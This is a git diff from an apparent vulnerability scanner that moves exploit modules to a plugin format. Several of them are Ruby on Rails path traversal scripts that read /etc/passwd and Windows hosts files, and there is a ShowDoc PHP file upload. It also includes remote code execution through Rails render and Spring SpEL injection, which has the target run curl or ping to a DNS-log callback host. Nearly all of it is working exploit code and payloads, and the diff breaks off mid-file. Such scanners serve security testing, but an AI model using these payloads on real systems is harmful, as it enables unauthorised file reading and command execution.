-        'path-2': 'file:%2f%2f{}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/C:/Windows/System32/drivers/etc/hosts',
-    },
-]
-
-def cve_2018_3760_scan(clients):
-    ''' 在开发环境中使用 Sprockets 作为静态文件服务器
-        Sprockets 3.7.1及更低版本存在二次解码导致的路径遍历漏洞, 攻击者可以使用%252e%252e/访问根目录并读取或执行目标服务器上的任何文件
-    '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'Ruby on Rails',
-        'vul_type': 'File-Read',
-        'vul_id': 'CVE-2018-3760',
-    }
-
-    for payload in cve_2018_3760_payloads:
-        # todo 1/ 第一个请求, 寻找 RoR的load路径, 根据路径尝试FileRead漏洞
-        path_1 = payload['path-1']
-
-        res1 = client.request(
-            'get',
-            path_1,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res1 is None:
-            continue
-
-        load_path_re = r'<h2>.* is no longer under a load path: .*/.{0,30}</h2>'
-        load_path_search = re.search(load_path_re, res1.text, re.I|re.M|re.U|re.S)
-        
-        if load_path_search:
-            load_path_s = load_path_search.group(0).lstrip('<h2>').rstrip('</h2>')
-            load_path_s = load_path_s.replace('/etc/passwd is no longer under a load path: ', '')
-            load_path_s = load_path_s.replace('C:/Windows/System32/drivers/etc/hosts is no longer under a load path: ', '')
-            load_path_list = load_path_s.split(', ')
-
-            for load_path in load_path_list:
-                path_2 = payload['path-2'].format(load_path)
-
-                res2 = client.request(
-                    'get',
-                    path_2,
-                    allow_redirects=False,
-                    vul_info=vul_info
-                )
-                if res2 is None:
-                    continue
-
-                if (check.check_res_fileread(res2.text)):
-                    results = {
-                        'Target': res2.request.url,
-                        'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                        'Request': res2
-                    }
-                    return results
-    return None
diff --git a/payloads/RubyOnRails/cve_2019_5418.py b/payloads/RubyOnRails/cve_2019_5418.py
deleted file mode 100644
index f48e72a..0000000
--- a/payloads/RubyOnRails/cve_2019_5418.py
+++ /dev/null
@@ -1,44 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool import check
-
-cve_2019_5418_payloads = [
-    {'headers': {'Accept': '../../../../../../../../etc/passwd{{'}},
-    {'headers': {'Accept': '../../../../../../../../C:/Windows/System32/drivers/etc/hosts{{'}},
-    {'headers': {'Accept': '../../../../../../../../C:\Windows\System32\drivers\etc\hosts{{'}}
-]
-
-def cve_2019_5418_scan(clients):
-    ''' 在控制器中通过render file形式来渲染应用之外的视图, 且会根据用户传入的Accept头来确定文件具体位置
-        通过传入Accept: ../../../../../../../../etc/passwd{{头来构成构造路径穿越漏洞, 读取任意文件
-    '''
-    client = clients.get('reqClient')
-
-    vul_info = {
-        'app_name': 'Ruby on Rails',
-        'vul_type': 'File-Read',
-        'vul_id': 'CVE-2019-5418',
-    }
-
-    for payload in cve_2019_5418_payloads:
-        headers = payload['headers']
-
-        res = client.request(
-            'get',
-            '',
-            headers=headers,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        if (check.check_res_fileread(res.text)):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/RubyOnRails/cve_2020_8163.py b/payloads/RubyOnRails/cve_2020_8163.py
deleted file mode 100644
index b8dbd0b..0000000
--- a/payloads/RubyOnRails/cve_2020_8163.py
+++ /dev/null
@@ -1,48 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.api.dns import dns
-from lib.tool.md5 import random_md5
-
-cve_2020_8163_payloads = [
-    {'path': '?[system("curl DNSDOMAIN")end%00]'},
-    {'path': '?[system("ping -c 4 DNSDOMAIN")end%00]'},
-    {'path': '?[system("ping DNSDOMAIN")end%00]'}
-]
-
-def cve_2020_8163_scan(clients):
-    ''' 在 Rails 5.0.1 之前版本中的一个代码注入漏洞, 
-        它允许攻击者控制"render"调用"locals"参数执行RCE
-    '''
-    client = clients.get('reqClient')
-    sessid = '2892b92d3c3a1d8b4ab069947ddbc552'
-
-    vul_info = {
-        'app_name': 'Ruby on Rails',
-        'vul_type': 'RCE',
-        'vul_id': 'CVE-2020-8163',
-    }
-
-    for payload in cve_2020_8163_payloads:
-        md = random_md5()                                       # * 随机md5值, 8位
-        dns_domain = md + '.' + dns.domain(sessid)              # * dnslog/ceye域名
-
-        path = payload['path'].replace('DNSDOMAIN', dns_domain)
-
-        res = client.request(
-            'get',
-            path,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        if (dns.result(md, sessid)):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/RubyOnRails/main.py b/payloads/RubyOnRails/main.py
deleted file mode 100644
index f8b9be5..0000000
--- a/payloads/RubyOnRails/main.py
+++ /dev/null
@@ -1,44 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-Ruby On Rails 是著名的Ruby Web开发框架
-    Ruby on Rails扫描类: 
-        1. Ruby on Rails 路径遍历
-            CVE-2018-3760
-                Payload: https://vulhub.org/#/environments/rails/CVE-2018-3760/
-
-        2. Ruby on Rails 路径穿越与任意文件读取
-            CVE-2019-5418
-                Payload: https://vulhub.org/#/environments/rails/CVE-2019-5418/
-
-        3. Ruby on Rails 命令执行
-            CVE-2020-8163
-                Payload: https://github.com/h4ms1k/CVE-2020-8163/
-
-file:///etc/passwd
-file:///C:/Windows/System32/drivers/etc/hosts
-file:///C:\Windows\System32\drivers\etc\hosts
-'''
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.RubyOnRails.cve_2018_3760 import cve_2018_3760_scan
-from payloads.RubyOnRails.cve_2019_5418 import cve_2019_5418_scan
-from payloads.RubyOnRails.cve_2020_8163 import cve_2020_8163_scan
-
-class RubyOnRails():
-    def __init__(self):
-        self.app_name = 'Ruby on Rails'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=cve_2018_3760_scan, clients=clients),
-            thread(target=cve_2019_5418_scan, clients=clients),
-            thread(target=cve_2020_8163_scan, clients=clients)
-        ]
-
-rails = RubyOnRails()
diff --git a/payloads/RubyOnRails/ruby-on-rails-cve-2018-3760-fileread.py b/payloads/RubyOnRails/ruby-on-rails-cve-2018-3760-fileread.py
new file mode 100644
index 0000000..5a9861a
--- /dev/null
+++ b/payloads/RubyOnRails/ruby-on-rails-cve-2018-3760-fileread.py
@@ -0,0 +1,95 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Ruby on Rails 路径遍历
+    CVE-2018-3760
+        Payload: https://vulhub.org/#/environments/rails/CVE-2018-3760/
+
+在开发环境中使用 Sprockets 作为静态文件服务器
+    Sprockets 3.7.1及更低版本存在二次解码导致的路径遍历漏洞,
+    攻击者可以使用%252e%252e/访问根目录并读取或执行目标服务器上的任何文件
+'''
+
+from lib.tool import check
+import re
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {
+                'path-1': 'assets/file:%2f%2f/etc/passwd',
+                'path-2': 'assets/file:%2f%2f{}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd',
+            },
+            {
+                'path-1': 'assets/file:%2f%2f/C:/Windows/System32/drivers/etc/hosts',
+                'path-2': 'assets/file:%2f%2f{}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/C:/Windows/System32/drivers/etc/hosts',
+            },
+            {
+                'path-1': 'file:%2f%2f/etc/passwd',
+                'path-2': 'file:%2f%2f{}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd',
+            },
+            {
+                'path-1': 'file:%2f%2f/C:/Windows/System32/drivers/etc/hosts',
+                'path-2': 'file:%2f%2f{}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/C:/Windows/System32/drivers/etc/hosts',
+            },
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'Ruby on Rails',
+            'vul_type': 'File-Read',
+            'vul_id': 'CVE-2018-3760',
+        }
+
+        for payload in self.payloads:
+            # todo 1/ 第一个请求, 寻找 RoR的load路径, 根据路径尝试FileRead漏洞
+            path_1 = payload['path-1']
+
+            res1 = client.request(
+                'get',
+                path_1,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res1 is None:
+                continue
+
+            load_path_re = r'<h2>.* is no longer under a load path: .*/.{0,30}</h2>'
+            load_path_search = re.search(load_path_re, res1.text, re.I|re.M|re.U|re.S)
+            
+            if load_path_search:
+                load_path_s = load_path_search.group(0).lstrip('<h2>').rstrip('</h2>')
+                load_path_s = load_path_s.replace('/etc/passwd is no longer under a load path: ', '')
+                load_path_s = load_path_s.replace('C:/Windows/System32/drivers/etc/hosts is no longer under a load path: ', '')
+                load_path_list = load_path_s.split(', ')
+
+                for load_path in load_path_list:
+                    path_2 = payload['path-2'].format(load_path)
+
+                    res2 = client.request(
+                        'get',
+                        path_2,
+                        allow_redirects=False,
+                        vul_info=vul_info
+                    )
+                    if res2 is None:
+                        continue
+
+                    if (check.check_res_fileread(res2.text)):
+                        results = {
+                            'Target': res2.request.url,
+                            'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                            'Request': res2
+                        }
+                        return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/RubyOnRails/ruby-on-rails-cve-2019-5418-fileread.py b/payloads/RubyOnRails/ruby-on-rails-cve-2019-5418-fileread.py
new file mode 100644
index 0000000..a19090b
--- /dev/null
+++ b/payloads/RubyOnRails/ruby-on-rails-cve-2019-5418-fileread.py
@@ -0,0 +1,65 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Ruby on Rails 路径穿越与任意文件读取
+    CVE-2019-5418
+        Payload: https://vulhub.org/#/environments/rails/CVE-2019-5418/
+
+在控制器中通过render file形式来渲染应用之外的视图, 且会根据用户传入的Accept头来确定文件具体位置
+    通过传入Accept: ../../../../../../../../etc/passwd{{头来构成构造路径穿越漏洞, 读取任意文件
+'''
+
+from payloads.RubyOnRails.tool_get_route_path import get_route_path
+from lib.tool import check
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'headers': {'Accept': '../../../../../../../../etc/passwd{{'}},
+            {'headers': {'Accept': '../../../../../../../../C:/Windows/System32/drivers/etc/hosts{{'}},
+            {'headers': {'Accept': '../../../../../../../../C:\Windows\System32\drivers\etc\hosts{{'}}
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+
+        vul_info = {
+            'app_name': 'Ruby on Rails',
+            'vul_type': 'File-Read',
+            'vul_id': 'CVE-2019-5418',
+        }
+        
+        dataRoutePath = get_route_path(client, vul_info)        # * 获取有效路由(路径)
+        if not dataRoutePath:
+            return None
+
+        for payload in self.payloads:
+            headers = payload['headers']
+
+            for routePath in dataRoutePath:
+                res = client.request(
+                    'get',
+                    routePath,
+                    headers=headers,
+                    allow_redirects=False,
+                    vul_info=vul_info
+                )
+                if res is None:
+                    continue
+
+                if (check.check_res_fileread(res.text)):
+                    results = {
+                        'Target': res.request.url,
+                        'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                        'Request': res
+                    }
+                    return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/RubyOnRails/ruby-on-rails-cve-2020-8163-rce.py b/payloads/RubyOnRails/ruby-on-rails-cve-2020-8163-rce.py
new file mode 100644
index 0000000..91d7c09
--- /dev/null
+++ b/payloads/RubyOnRails/ruby-on-rails-cve-2020-8163-rce.py
@@ -0,0 +1,69 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Ruby on Rails 命令执行
+    CVE-2020-8163
+        Payload: https://github.com/h4ms1k/CVE-2020-8163/
+
+在 Rails 5.0.1 之前版本中的一个代码注入漏洞, 
+    它允许攻击者控制"render"调用"locals"参数执行RCE
+'''
+
+from payloads.RubyOnRails.tool_get_route_path import get_route_path
+from lib.api.dns import dns
+from lib.tool.md5 import random_md5
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': '?[system("curl DNSDOMAIN")end%00]'},
+            {'path': '?[system("ping -c 4 DNSDOMAIN")end%00]'},
+            {'path': '?[system("ping DNSDOMAIN")end%00]'}
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        sessid = '2892b92d3c3a1d8b4ab069947ddbc552'
+
+        vul_info = {
+            'app_name': 'Ruby on Rails',
+            'vul_type': 'RCE',
+            'vul_id': 'CVE-2020-8163',
+        }
+
+        dataRoutePath = get_route_path(client, vul_info)        # * 获取有效路由(路径)
+        if not dataRoutePath:
+            return None
+
+        for payload in self.payloads:
+            md = random_md5()                                       # * 随机md5值, 8位
+            dns_domain = md + '.' + dns.domain(sessid)              # * dnslog/ceye域名
+
+            path = payload['path'].replace('DNSDOMAIN', dns_domain)
+
+            for routePath in dataRoutePath:
+                res = client.request(
+                    'get',
+                    routePath + path,
+                    allow_redirects=False,
+                    vul_info=vul_info
+                )
+                if res is None:
+                    continue
+
+                if (dns.result(md, sessid)):
+                    results = {
+                        'Target': res.request.url,
+                        'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                        'Request': res
+                    }
+                    return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/RubyOnRails/tool_get_route_path.py b/payloads/RubyOnRails/tool_get_route_path.py
new file mode 100644
index 0000000..2993a42
--- /dev/null
+++ b/payloads/RubyOnRails/tool_get_route_path.py
@@ -0,0 +1,31 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+import re
+
+def get_route_path(client, vul_info):
+    ''' 获取Ruby on Rails的路径 '''
+    new_routePathList = []
+    
+    res = client.request(
+        'get',
+        'abcdefg',
+        allow_redirects=False,
+        vul_info=vul_info
+    )
+    if res is None:
+        return None
+    
+    s = re.compile(r"<td data-route-path='/.{1,200}\(\.:format\)'")
+    routePathList = s.findall(res.text, re.I|re.M|re.S)
+
+    if routePathList:
+        for path in routePathList:
+            path = path.replace("<td data-route-path='/", '')
+            path = path.replace("(.:format)'", '')
+            new_routePathList.append(path)
+
+        new_routePathList.append('')        # * 空路径(当前路径)
+        return new_routePathList
+    else:
+        return None
diff --git a/payloads/ShowDoc/cnvd_2020_26585.py b/payloads/ShowDoc/cnvd_2020_26585.py
deleted file mode 100644
index f476cb8..0000000
--- a/payloads/ShowDoc/cnvd_2020_26585.py
+++ /dev/null
@@ -1,74 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool.md5 import random_md5, random_num
-from lib.tool import check
-import re
-
-randomNum = random_num(24)
-randomStr_1 = random_md5()
-randomStr_2 = random_md5()
-
-cnvd_2020_26585_payloads = [
-    {
-        'path': 'index.php?s=/home/page/uploadImg',
-        'data': '----------------------------{NUM}\n'\
-                'Content-Disposition: form-data; name="editormd-image-file"; filename="{FILENAME}.<>php"\n'\
-                'Content-Type: text/plain\n'\
-                '\n'\
-                '<?php echo "{RCEMD}"?>\n'\
-                '----------------------------{NUM}--'.format(NUM=randomNum, FILENAME=randomStr_1, RCEMD=randomStr_2),
-        'headers': {'Content-Type': 'multipart/form-data; boundary=--------------------------{NUM}'.format(NUM=randomNum)}
-    }
-]
-
-def cnvd_2020_26585_scan(clients):
-    ''' api_page存在任意文件上传 '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'ShowDoc',
-        'vul_type': 'FileUpload',
-        'vul_id': 'CNVD-2020-26585',
-    }
-
-    for payload in cnvd_2020_26585_payloads:
-        path = payload['path']
-        data = payload['data']
-        headers = payload['headers']
-
-        res = client.request(
-            'post',
-            path,
-            data=data,
-            headers=headers,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        file_path = re.search(r'(http){1}.*(\.php){1}', res.text)             # * 是否返回了文件路径
-        if (('"success":1' in res.text) and file_path):
-            file_path = file_path.group()                                     # * 提取返回的文件路径
-            file_path = file_path.replace('\\', '')                           # * 替换反斜杠\ 改为合法url
-
-            res2 = client.request(
-                'get',
-                file_path,
-                allow_redirects=False,
-                vul_info=vul_info,
-            )
-            if res2 is None:
-                continue
-
-            if (check.check_res(res2.text, randomStr_2)):
-                results = {
-                    'Target': res.request.url,
-                    'Verify': res2.request.url,
-                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                    'Request-1': res,
-                    'Request-2': res2
-                }
-                return results
-    return None
diff --git a/payloads/ShowDoc/main.py b/payloads/ShowDoc/main.py
deleted file mode 100644
index e126dc0..0000000
--- a/payloads/ShowDoc/main.py
+++ /dev/null
@@ -1,32 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-ShowDoc是一个API文档工具, 可以使用它来编写接口文档: https://www.showdoc.com.cn/
-    ShowDoc扫描类: 
-        1. ShowDoc 任意文件上传
-            CNVD-2020-26585
-                Payload: https://blog.csdn.net/weixin_51387754/article/details/121093802
-
-file:///etc/passwd
-file:///C:\Windows\System32\drivers\etc\hosts
-file:///C:/Windows/System32/drivers/etc/hosts
-'''
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.ShowDoc.cnvd_2020_26585 import cnvd_2020_26585_scan
-
-class ShowDoc():
-    def __init__(self):
-        self.app_name = 'ShowDoc'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=cnvd_2020_26585_scan, clients=clients)
-        ]
-
-showdoc = ShowDoc()
diff --git a/payloads/ShowDoc/showdoc-cnvd-2020-26585-fileupload.py b/payloads/ShowDoc/showdoc-cnvd-2020-26585-fileupload.py
new file mode 100644
index 0000000..536305e
--- /dev/null
+++ b/payloads/ShowDoc/showdoc-cnvd-2020-26585-fileupload.py
@@ -0,0 +1,94 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+ShowDoc 任意文件上传
+    CNVD-2020-26585
+        Payload: https://blog.csdn.net/weixin_51387754/article/details/121093802
+
+api_page存在任意文件上传
+'''
+
+from lib.tool.md5 import random_md5, random_num
+from lib.tool import check
+import re
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.randomNum = random_num(24)
+        self.randomStr_1 = random_md5()
+        self.randomStr_2 = random_md5()
+
+        self.payloads = [
+            {
+                'path': 'index.php?s=/home/page/uploadImg',
+                'data': '----------------------------{NUM}\n'\
+                        'Content-Disposition: form-data; name="editormd-image-file"; filename="{FILENAME}.<>php"\n'\
+                        'Content-Type: text/plain\n'\
+                        '\n'\
+                        '<?php echo "{RCEMD}"?>\n'\
+                        '----------------------------{NUM}--'.format(NUM=self.randomNum, FILENAME=self.randomStr_1, RCEMD=self.randomStr_2),
+                'headers': {'Content-Type': 'multipart/form-data; boundary=--------------------------{NUM}'.format(NUM=self.randomNum)}
+            }
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'ShowDoc',
+            'vul_type': 'FileUpload',
+            'vul_id': 'CNVD-2020-26585',
+        }
+
+        for payload in self.payloads:
+            path = payload['path']
+            data = payload['data']
+            headers = payload['headers']
+
+            res = client.request(
+                'post',
+                path,
+                data=data,
+                headers=headers,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            file_path = re.search(r'(http){1}.*(\.php){1}', res.text)             # * 是否返回了文件路径
+            if (('"success":1' in res.text) and file_path):
+                file_path = file_path.group()                                     # * 提取返回的文件路径
+                file_path = file_path.replace('\\', '')                           # * 替换反斜杠\ 改为合法url
+
+                res2 = client.request(
+                    'get',
+                    file_path,
+                    allow_redirects=False,
+                    vul_info=vul_info,
+                )
+                if res2 is None:
+                    continue
+
+                if (check.check_res(res2.text, self.randomStr_2)):
+                    results = {
+                        'Target': res.request.url,
+                        'Verify': res2.request.url,
+                        'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                        'Request-1': res,
+                        'Request-2': res2
+                    }
+                    return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
+
+
+def cnvd_2020_26585_scan(clients):
+    '''  '''
diff --git a/payloads/Spring/cve_2016_4977.py b/payloads/Spring/cve_2016_4977.py
deleted file mode 100644
index 2a63961..0000000
--- a/payloads/Spring/cve_2016_4977.py
+++ /dev/null
@@ -1,48 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool.md5 import random_int_2
-
-cve_2016_4977_payloads = [
-    {'path': 'oauth/authorize?response_type={RCECOMMAND}&client_id=acme&scope=openid&redirect_uri=http://test'},
-    {'path': 'authorize?response_type={RCECOMMAND}&client_id=acme&scope=openid&redirect_uri=http://test'},
-]
-
-def cve_2016_4977_scan(clients):
-    ''' Spring Security OAuth是为Spring框架提供安全认证支持的一个模块;
-        在其使用whitelabel views来处理错误时, 由于使用了Springs Expression Language (SpEL), 
-            攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令
-    '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'Spring',
-        'vul_type': 'RCE',
-        'vul_id': 'CVE-2016-4977',
-    }
-
-    for payload in cve_2016_4977_payloads:
-        randomNum_1, randomNum_2 = random_int_2()
-        RCEcommand = '${' + str(randomNum_1) + '*' + str(randomNum_2) + '}'
-        
-        path = payload['path'].format(RCECOMMAND=RCEcommand)
-
-        res = client.request(
-            'get',
-            path,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-        
-        randomNum_sum = str(randomNum_1 * randomNum_2)
-
-        if (randomNum_sum in res.text):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/Spring/cve_2017_8046.py b/payloads/Spring/cve_2017_8046.py
deleted file mode 100644
index 1126368..0000000
--- a/payloads/Spring/cve_2017_8046.py
+++ /dev/null
@@ -1,80 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.api.dns import dns
-from lib.tool.md5 import random_md5
-from time import sleep
-
-cve_2017_8046_payloads = [
-    {   # * curl
-        'path': '1',
-        'data': '[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{99,117,114,108,32,DNSDOMAIN}))/lastname", "value": "vulhub" }]'
-    },
-    {   # * ping -c 4
-        'path': '1',
-        'data': '[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{112,105,110,103,32,45,99,32,52,32,DNSDOMAIN}))/lastname", "value": "vulhub" }]'
-    },
-    {   # * ping
-        'path': '1',
-        'data': '[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{112,105,110,103,32,DNSDOMAIN}))/lastname", "value": "vulhub" }]'
-    },
-]
-
-def cve_2017_8046_scan(clients):
-    ''' 构造ASCII码的JSON数据包, 向spring-data-rest服务器提交恶意PATCH请求, 可以执行任意代码 '''
-    client = clients.get('reqClient')
-    sessid = '8d2aba535b132733b453254c40e50f95'
-    
-    vul_info = {
-        'app_name': 'Spring',
-        'vul_type': 'RCE',
-        'vul_id': 'CVE-2017-8046',
-    }
-
-    headers = {
-        'Content-Type': 'application/json-patch+json'
-    }
-
-    # * 先使用POST请求添加一个对象, 防止目标不存在对象 导致漏洞利用失败
-    res1 = client.request(
-        'post',
-        '',
-        data='{}', 
-        headers={'Content-Type': 'application/json'},
-        allow_redirects=False,
-        vul_info=vul_info
-    )
-
-    for payload in cve_2017_8046_payloads:
-        md = random_md5()                                       # * 随机md5值, 8位
-        dns_domain = md + '.' + dns.domain(sessid)              # * dnslog/ceye域名
-        
-        # ! 该漏洞的Payload需要转换成ASCII码, 以逗号分隔每一个字母的ASCII编码
-        ascii_dns_domain = ''
-        for b in dns_domain:
-            ascii_dns_domain += str(ord(b)) + ','
-
-        path = payload['path']
-        data = payload['data'].replace('DNSDOMAIN', ascii_dns_domain[:-1])
-
-        res2 = client.request(
-            'patch',
-            path,
-            data=data, 
-            headers=headers,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res2 is None:
-            continue
-
-        sleep(3)
-        if (dns.result(md, sessid)):
-            results = {
-                'Target': res2.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Encodeing': 'ASCII',
-                'Request': res2,
-            }
-            return results
-    return None
diff --git a/payloads/Spring/cve_2018_1273.py b/payloads/Spring/cve_2018_1273.py
deleted file mode 100644
index 7393489..0000000
--- a/payloads/Spring/cve_2018_1273.py
+++ /dev/null
@@ -1,68 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.api.dns import dns
-from lib.tool.md5 import random_md5
-from time import sleep
-
-cve_2018_1273_payloads = [
-    {
-        'path': 'users?page=&size=5',
-        'data': 'username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("curl DNSDOMAIN")]=&password=&repeatedPassword='
-    },
-    {
-        'path': 'users?page=&size=5',
-        'data': 'username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("ping -c 4 DNSDOMAIN")]=&password=&repeatedPassword='
-    },
-    {
-        'path': 'users?page=&size=5',
-        'data': 'username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("ping DNSDOMAIN")]=&password=&repeatedPassword='
-    }
-]
-
-def cve_2018_1273_scan(clients):
-    ''' Spring Data是一个用于简化数据库访问, 并支持云服务的开源框架;
-        Spring Data Commons是Spring Data下所有子项目共享的基础框架;
-        Spring Data Commons 在2.0.5及以前版本中, 存在一处SpEL表达式注入漏洞, 
-            攻击者可以注入恶意SpEL表达式以执行任意命令
-    '''
-    client = clients.get('reqClient')
-    sessid = 'f638f51cbd7085fc19b791bb689ad7d7'
-    
-    vul_info = {
-        'app_name': 'Spring',
-        'vul_type': 'RCE',
-        'vul_id': 'CVE-2018-1273',
-    }
-    
-    headers = {
-        'Referer': client.base_url
-    }
-
-    for payload in cve_2018_1273_payloads:
-        md = random_md5()                                       # * 随机md5值, 8位
-        dns_domain = md + '.' + dns.domain(sessid)              # * dnslog/ceye域名
-
-        path = payload['path']
-        data = payload['data'].replace('DNSDOMAIN', dns_domain)
-
-        res = client.request(
-            'post',
-            path,
-            data=data,
-            headers=headers,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        sleep(3)
-        if (dns.result(md, sessid)):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/Spring/cve_2020_5410.py b/payloads/Spring/cve_2020_5410.py
deleted file mode 100644
index 6101c5c..0000000
--- a/payloads/Spring/cve_2020_5410.py
+++ /dev/null
@@ -1,42 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool import check
-
-cve_2020_5410_payloads = [
-    {'path': '..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"'},
-    {'path': '..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252FC:/Windows/System32/drivers/etc/hosts%23foo/development"'},
-    {'path': '..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252FC:\Windows\System32\drivers\etc\hosts%23foo/development"'}
-]
-
-def cve_2020_5410_scan(clients):
-    ''' spring cloud config server目录遍历漏洞
-            可以使用特制URL发送请求, 从而跨目录读取文件。
-    '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'Spring',
-        'vul_type': 'FileRead',
-        'vul_id': 'CVE-2020-5410',
-    }
-
-    for payload in cve_2020_5410_payloads:  # * Payload
-        path = payload['path']              # * Path
-
-        res = client.request(
-            'get',
-            path,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        if (check.check_res_fileread(res.text)):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/Spring/cve_2021_21234.py b/payloads/Spring/cve_2021_21234.py
deleted file mode 100644
index 423dba2..0000000
--- a/payloads/Spring/cve_2021_21234.py
+++ /dev/null
@@ -1,44 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool import check
-
-cve_2021_21234_payloads = [
